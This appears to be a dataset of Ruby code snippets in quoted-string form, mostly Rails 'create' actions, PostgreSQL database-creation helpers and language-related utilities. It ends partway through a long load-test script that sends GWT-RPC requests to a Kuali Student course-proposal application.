"def create\n @langue = Langue.new(langue_params)\n\n respond_to do |format|\n if @langue.save\n format.html { redirect_to @langue, notice: 'Langue was successfully created.' }\n format.json { render :show, status: :created, location: @langue }\n else\n format.html { render :new }\n format.json { render json: @langue.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_function(name, definition, opts=OPTS)\n self << create_function_sql(name, definition, opts)\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create\n @langopt = Langopt.new(langopt_params)\n\n respond_to do |format|\n if @langopt.save\n format.html { redirect_to @langopt, notice: 'Langopt was successfully created.' }\n format.json { render :show, status: :created, location: @langopt }\n else\n format.html { render :new }\n format.json { render json: @langopt.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @lang = Lang.new(params[:lang])\n\n respond_to do |format|\n if @lang.save\n format.html { redirect_to @lang, notice: 'Lang was successfully created.' }\n format.json { render json: @lang, status: :created, location: @lang }\n else\n format.html { render action: \"new\" }\n format.json { render json: @lang.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def register_language language_name, language = nil\n language_string = language_name.to_s\n @@languages[language_string.to_s] = language\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def uhook_new_from_name name, options = {}\n ::Category.new(\n :name => name,\n :locale => (options[:locale] || :any).to_s,\n :parent_id => options[:parent_id]\n )\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_database(name)\n end",
"def create_translated_table(create_table_options = {})\n # create translatin column in main table, if it does not exist\n if !self.columns.find { |c| [self.language_column.to_s].include? c.name }\n self.connection.add_column table_name, self.language_column, :string\n end\n\n return if self.connection.table_exists?(translation_table_name)\n\n self.connection.create_table(translation_table_name, create_table_options) do |t|\n t.column translation_foreign_key, :integer\n t.column language_column, :string\n t.timestamps\n end\n \n trans_columns = if create_table_options[:columns]\n self.content_columns.select {|col| create_table_options[:columns].include?(col.name.to_sym) } \n else\n self.content_columns\n end\n\n trans_columns.each do |col| \n if !((self.connection.columns self.translation_table_name.to_sym).include?(col.name)) then\n self.connection.add_column translation_table_name, col.name, col.type, \n :limit => col.limit, \n :default => col.default,\n :scale => col.scale,\n :precision => col.precision\n end\n end\n\n self.connection.add_index translation_table_name, translation_foreign_key\n end",
"def initialize(name, owner, language)\r\n super(name, owner)\r\n self.language = language\r\n @prog = nil\r\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def generate(name, glsl, typeInfo)\n # Merge type information for all argument lists a function might\n # have.\n minParam, paramTypes = mergeParameterLists(typeInfo.parameterLists)\n\n # Assemble type annotations for the closure compile.\n paramtypestr = []\n paramstr = []\n (0...minParam).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n (minParam...paramTypes.size).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})=} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n annotations = paramtypestr.join(\"\\n\")\n\n return <<EOF\n\n/**\n * Create expression for GLSL function '#{glsl}'.\n *\n#{annotations}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{paramstr.join(\",\\n \")}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.BUILTIN, cached, '#{name}', '#{glsl}', args);\n };\n})();\nEOF\nend",
"def create_translations\n end",
"def add_name_translation(text, lang_code)\n name_translation = NameTranslation.create(:text => text, :lang_code => lang_code)\n\n name_translations << name_translation\n end",
"def new_plan(name, puppet: false)\n Bolt::PlanCreator.validate_input(config.project, name)\n Bolt::PlanCreator.create_plan(config.project.plans_path, name, puppet)\n end",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\\n\"\nend",
"def create\n @language_dialect = LanguageDialect.new(language_dialect_params)\n\n respond_to do |format|\n if @language_dialect.save\n format.html { redirect_to @language_dialect, notice: 'Language dialect was successfully created.' }\n format.json { render :show, status: :created, location: @language_dialect }\n else\n format.html { render :new }\n format.json { render json: @language_dialect.errors, status: :unprocessable_entity }\n end\n end\n end",
"def introduction_with_language(name,language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def create_extension(extension_name, options = {})\n options = CREATE_EXTENSION_DEFAULTS.merge(options.symbolize_keys)\n\n sql = ['CREATE EXTENSION']\n sql << 'IF NOT EXISTS' if options[:if_not_exists]\n sql << %Q{\"#{extension_name.to_s}\"}\n sql << \"SCHEMA #{options[:schema_name]}\" if options[:schema_name].present?\n sql << \"VERSION '#{options[:version]}'\" if options[:version].present?\n sql << \"FROM #{options[:old_version]}\" if options[:old_version].present?\n\n sql = sql.join(' ')\n execute(sql)\n end",
"def create_engine(params={})\n text = parameters(params, :text)\n opts = engine_options(params)\n\n ::Maruku.new(text, opts)\n end",
"def create\n @language = Language.new(language_params)\n\n respond_to do |format|\n if @language.save\n format.html { redirect_to @language, notice: 'Language was successfully created.' }\n format.json { render :show, status: :created, location: @language }\n else\n format.html { render :new }\n format.json { render json: @language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def language\n if !block_given?\n return @j_del.java_method(:language, []).call()\n end\n raise ArgumentError, \"Invalid arguments when calling language()\"\n end",
"def create\n unless current_user.admin?\n redirect_to :tournaments, flash: {error: 'Only administrators can create new tournaments.'}\n return\n end\n\n @tournament = Tournament.new(tournament_params)\n\n if @tournament.save\n # now create the TournamentLanguages\n TournamentLanguage::LanguageOptions.each do |(name, key)|\n if params['languages'][key] == \"1\"\n TournamentLanguage.create(language: name, tournament_id: @tournament.tournament_id)\n end\n end\n redirect_to @tournament, flash: {success: 'Tournament was created!'}\n else\n redirect_to @tournament, flash: {error: \"Failed to create tournament: #{@tournament.errors.full_messages}\"}\n end\n end",
"def create_db(options)\n info \"Created database '#{options[:name]}'\"\n end",
"def sign_up(name:, user_name:)\n user_name = user_name.downcase\n return SYNTAX_ERROR if include_punctuation?(user_name)\n return TOO_LONG_ERROR if too_long?(user_name)\n return TOO_SHORT_ERROR if too_short?(user_name)\n\n @user_class.add(name: name, user_name: user_name)\n end",
"def enable_extension(name)\n execute(\"CREATE EXTENSION IF NOT EXISTS \\\"#{name}\\\"\")\n end",
"def create\n # @language = Language.new(language_params)\n\n # respond_to do |format|\n # if @language.save\n # format.html { redirect_to @language, notice: 'Language was successfully created.' }\n # format.json { render :show, status: :created, location: @language }\n # else\n # format.html { render :new }\n # format.json { render json: @language.errors, status: :unprocessable_entity }\n # end\n # end\n end",
"def create\n @language = Language.new(params[:language])\n\n respond_to do |format|\n if @language.save\n flash[:notice] = t('languages.new.success')\n format.html { redirect_to(@language) }\n format.xml { render :xml => @language, :status => :created, :location => @language }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @language.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create_locale\n set_params\n create_locale_file( params[:locale], params[:locale_name] )\n redirect_to :back\n end",
"def language(options = {})\n Babel.guess(self, options)\n end",
"def create_from_file( file_name )\n vcg = ValidationCheckerGenerator.new\n vcg.generate( LDLgeneratedLanguage::Language_gds_check.parse( File.read( file_name ) ) )\n end",
"def create\n @r_language = RLanguage.new(r_language_params)\n\n respond_to do |format|\n if @r_language.save\n format.html { redirect_to @r_language, notice: 'R language was successfully created.' }\n format.json { render action: 'show', status: :created, location: @r_language }\n else\n format.html { render action: 'new' }\n format.json { render json: @r_language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create name='', config={}, project=nil\n @@step_map[name.to_sym].new(name, config, project) || Step.new(name, config, project)\n end",
"def parse_lang_file\n # Open .lang file and parse it, then copy \n # its full grammatical expression.\n File.open(@lang_file, \"r:UTF-8\") do |file|\n lines_count = 1\n current = :none\n\n # Evaluating lines\n while (line = file.gets)\n # Parsing .lang file\n case line\n when /(^\\s*$)|(^\\s*#.*$)/\n # Ignore blank lines or comments\n \n when /^\\s*symbols\\s*for\\s*(\\w*)?\\s*(\\w+)\\s*:\\s*(#.*)?$/\n # Create new symbol set\n captured = line.scan(/\\s*(\\w+)\\s*:/)\n current_binding = captured[0][0]\n @bindings[current_binding] = ConlangWordGenerator::SymbolSet.new\n current = :symbols\n\n when /^\\s*expression\\s*:\\s*(#.*)?$/\n # Start of grammatical expression\n current = :expression\n\n when /^\\s*replacements\\s*:\\s*(#.*)?$/\n # Start of list of replacements\n current = :replacements\n\n when /^\\s*(\\S+)\\s*[:=]\\s*(\\S+)\\s*(#.*)?$/\n # Add bindings\n case current\n when :symbols\n #Add a symbol to the current SymbolSet's binding\n @bindings[current_binding].add_pair($1, $2.to_i)\n when :replacements\n @replacements[$1] = $2\n else\n raise LangSyntaxError, \"Runtime error when evaluating \" +\n \"\\\"#{@lang_file}\\\" at binding line #{lines_count}.\"\n end\n else\n if current == :expression\n # Copying expression\n @full_expression += line.strip\n else\n raise LangSyntaxError, \"Runtime error when evaluating \" +\n \"\\\"#{@lang_file}\\\" at line #{lines_count}.\"\n end\n end\n\n #Counting lines\n lines_count += 1\n end\n end\n end",
"def plugin(name, options={})\n ops = resolve_defaults(options)\n GemPlugin::Manager.instance.create(name, ops)\n end",
"def create(name)\n self.new(name)\n end",
"def create_database(name, options = {})\n options = { encoding: 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.inject(\"\") do |memo, (key, value)|\n memo += case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def translate(*args, **opts); end",
"def introduction_with_language_optional(name,language=\"Ruby\")\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def create(name, action, seqno, opts = {})\n if opts.empty?\n cmds = name_commands(name, action, seqno)\n else\n if opts[:match] && !opts[:match].is_a?(Array)\n raise ArgumentError, 'opts match must be an Array'\n end\n cmds = name_commands(name, action, seqno, opts)\n if opts[:description]\n cmds << 'no description'\n cmds << \"description #{opts[:description]}\"\n end\n if opts[:continue]\n cmds << 'no continue'\n cmds << \"continue #{opts[:continue]}\"\n end\n if opts[:match]\n remove_match_statements(name, action, seqno, cmds)\n opts[:match].each do |options|\n cmds << \"match #{options}\"\n end\n end\n if opts[:set]\n remove_set_statements(name, action, seqno, cmds)\n opts[:set].each do |options|\n cmds << \"set #{options}\"\n end\n end\n end\n configure(cmds)\n end",
"def create_new_party\n # No language choice => default language\n if LANGUAGE_CHOICE_LIST.empty?\n $pokemon_party = PFM::Pokemon_Party.new(false, DEFAULT_GAME_LANGUAGE)\n else\n @all_window.each { |window| window.visible = false }\n call_scene(Language_Choice)\n end\n end",
"def create_by_name(name)\n self.new.tap do |o|\n o.name = name # ambos sirven\n end\n end",
"def handle_proglangs(proglang_names)\n return if !self.undergrad? || proglang_names.nil?\n self.proglangs = [] # eliminates any previous proficiencies so as to avoid duplicates\n proglang_array = []\n proglang_array = proglang_names.split(',').uniq if proglang_names\n proglang_array.each do |pl|\n self.proglangs << Proglang.find_or_create_by(name: pl.upcase.strip)\n end\n end",
"def create\r\n @language = Language.new(language_params)\r\n\r\n respond_to do |format|\r\n if @language.save\r\n format.html { redirect_to root_path, notice: 'language was successfully created.' }\r\n format.json { render action: 'show', status: :created, location: @language }\r\n else\r\n format.html { render action: 'new' }\r\n format.json { render json: @language.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def create\n @language = Language.new(params[:language])\n if current_user.is_admin?\n @language.verify = 'true'\n end\n\n respond_to do |format|\n if @language.save\n UserMailer.language_created_email(@language).deliver\n format.html { redirect_to :back, notice: t(:thanks_for_your_contribution_wait_verifying) }\n format.json { render json: @language, status: :created, location: @language }\n else\n format.html { redirect_to :back, alert: @language.errors.full_messages }\n format.json { render json: @language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def coding_with_language(#{name}, #{language})\n puts \"Hi, my name is #{name} and I am learning to program in #{language}!\"\nend",
"def generate(name, symbol, typeInfo)\n ptl = typeInfo.parameterLists[0]\n return <<EOF\n\n/**\n * Create expression for GLSL operator '#{symbol}'.\n *\n#{ptl.toClosureAnnotation}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{ptl.toParameterList}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.OPERATOR, cached, '#{name}', '#{symbol}', args);\n };\n})();\nEOF\nend",
"def after_create\n GetText::Db::Language.find(:all).each do |lang|\n self.completions.create(:language => lang)\n end\n end",
"def create\n @programming_l = ProgrammingL.new(programming_l_params)\n\n respond_to do |format|\n if @programming_l.save\n format.html { redirect_to @programming_l, notice: 'Programming l was successfully created.' }\n format.json { render :show, status: :created, location: @programming_l }\n else\n format.html { render :new }\n format.json { render json: @programming_l.errors, status: :unprocessable_entity }\n end\n end\n end",
"def edit_proposal(proposal_name, opts={})\n \n defaults = {\n :proposal_id_dyn_var => 'ep_proposal_id',\n :proposal_id_regexp => 'proposal.resultColumn.proposalId\\\"\\,\\\"\\([^\\\"]+\\)',\n #:proposal_dyn_var => 'ep_proposal',\n #:proposal_regexp => 'proposal\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_num_dyn_var => 'ep_proposal_num',\n :proposal_num_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :workflow_id_dyn_var => 'ep_workflow_id',\n :workflow_id_regexp => 'workflowId\\\"\\,\\\"\\([^\\\"]+\\)',\n :id_translation_id_dyn_var => 'ep_id_translation_id',\n :id_translation_id_regexp => 'id-translation\\\"\\,\\\"\\([^\\\"]+\\)',\n :code_dyn_var => 'ep_code',\n :code_regexp => 'code\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_num_suffix_dyn_var => 'ep_course_num_suffix',\n :course_num_suffix_regexp => 'courseNumberSuffix\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_id_dyn_var => 'ep_lo_cat_id',\n :lo_category_id_regexp => 'expirationDate\\\"\\,\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_dyn_var => 'ep_lo_cat',\n :lo_category_regexp => 'name\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_text_dyn_var => 'ep_lo_cat_text',\n :lo_cat_text_regexp => 'loInfo\\\"\\,\\\"sequence\\\"\\,\\\"0\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_id_dyn_var => 'ep_lo_cat_id',\n :lo_cat_id_regexp => '\\([^\\\"]+\\)\\\"\\,\\\"loRepositoryKey',\n :create_id_dyn_var => 'ep_create_id',\n :create_id_regexp => 'createId\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_title_dyn_var => 'ep_course_title',\n :course_title_regexp => 'courseTitle\\\"\\,\\\"\\([^\\\"]+\\)',\n :oversight_org_dyn_var => 'ep_oversight_org',\n :oversight_org_regexp => 'curriculumOversightOrgs\\\"\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :lab_fee_id_dyn_var => 'ep_lab_fee_id',\n :lab_fee_id_regexp => 'kuali.enum.type.feeTypes.labFee\\\"\\,\\\"\\([^\\\"]+\\)',\n :atp_dur_week_id_dyn_var => 'ep_atp_dur_week_id',\n :atp_dur_week_id_regexp => 'kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_id_dyn_var => 'ep_lab_id',\n :lab_id_regexp => 'Lab\\\"\\,\\\"\\([^\\\"]+\\)',\n :grade_id_dyn_var => 'ep_grade_id',\n :grade_id_regexp => 'kuali.resultComponent.grade[^\\,]+\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :person_id_dyn_var => 'ep_person_id',\n :person_id_regexp => 'personId\\\"\\,\\\"\\([^\\\"]+\\)',\n :joints_dyn_var => 'ep_joints',\n :joints_regexp => 'joints\\\"\\,\\\"\\([^\\\"]+\\)',\n :subject_area_dyn_var => 'ep_subject_area',\n :subject_area_regexp => 'subjectArea\\\"\\,\\\"\\([^\\\"]+\\)',\n :title_dyn_var => 'ep_title',\n :title_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :rationale_dyn_var => 'ep_rationale',\n :rationale_regexp => 'rationale\\\"\\,\\\"\\([^\\\"]+\\)',\n :modify_fields => {\n :course_information => {},\n :governance => {},\n :course_logistics => {},\n :learning_objectives => {},\n :active_dates => {},\n :financials => {}\n }\n }\n \n opts = defaults.merge(opts)\n \n # Search for proposal\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|13|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.lang.Integer/3438268394|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|proposal.queryParam.proposalOptionalName|#{proposal_name}|proposal.search.generic|proposal.resultColumn.proposalOptionalName|1|2|3|4|1|5|5|6|10|7|0|8|1|9|10|0|11|12|13|0|6|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:proposal_id_dyn_var], \"re\" => opts[:proposal_id_regexp]}\n ]\n }\n )\n \n # Select\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|isAuthorized|org.kuali.student.core.rice.authorization.PermissionType/259370389|java.util.Map|java.util.HashMap/962170901|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|6|5|1|7|1|8|9|8|10|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getMetadata|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|5|6|7|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getData|java.lang.String/2004016611|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:workflow_id_dyn_var], \"re\" => opts[:workflow_id_regexp]},\n {\"name\" => opts[:id_translation_id_dyn_var], \"re\" => opts[:id_translation_id_regexp]},\n {\"name\" => opts[:code_dyn_var], \"re\" => opts[:code_regexp]},\n {\"name\" => opts[:course_num_suffix_dyn_var], \"re\" => opts[:course_num_suffix_regexp]},\n {\"name\" => opts[:lo_category_id_dyn_var], \"re\" => opts[:lo_category_id_regexp]},\n {\"name\" => opts[:lo_category_dyn_var], \"re\" => opts[:lo_category_dyn_var]},\n {\"name\" => opts[:lo_cat_text_dyn_var], \"re\" => opts[:lo_cat_text_regexp]},\n {\"name\" => opts[:lo_cat_id_dyn_var], \"re\" => opts[:lo_cat_id_regexp]},\n {\"name\" => opts[:create_id_dyn_var], \"re\" => opts[:create_id_regexp]},\n {\"name\" => opts[:course_title_dyn_var], \"re\" => opts[:course_title_regexp]},\n {\"name\" => opts[:oversight_org_dyn_var], \"re\" => opts[:oversight_org_regexp]},\n {\"name\" => opts[:lab_fee_id_dyn_var], \"re\" => opts[:lab_fee_id_regexp]},\n {\"name\" => opts[:atp_dur_week_id_dyn_var], \"re\" => opts[:atp_dur_week_id_regexp]},\n {\"name\" => opts[:lab_id_dyn_var], \"re\" => opts[:lab_id_regexp]},\n {\"name\" => opts[:grade_id_dyn_var], \"re\" => opts[:grade_id_regexp]},\n {\"name\" => opts[:person_id_dyn_var], \"re\" => opts[:person_id_regexp]},\n {\"name\" => opts[:joints_dyn_var], \"re\" => opts[:joints_regexp]},\n {\"name\" => opts[:subject_area_dyn_var], \"re\" => opts[:subject_area_regexp]},\n {\"name\" => opts[:proposal_dyn_var], \"re\" => opts[:proposal_regexp]},\n {\"name\" => opts[:proposal_num_dyn_var], \"re\" => opts[:proposal_num_regexp]},\n {\"name\" => opts[:title_dyn_var], \"re\" => opts[:title_regexp]},\n {\"name\" => opts[:rationale_dyn_var], \"re\" => opts[:rationale_regexp]}\n ]\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 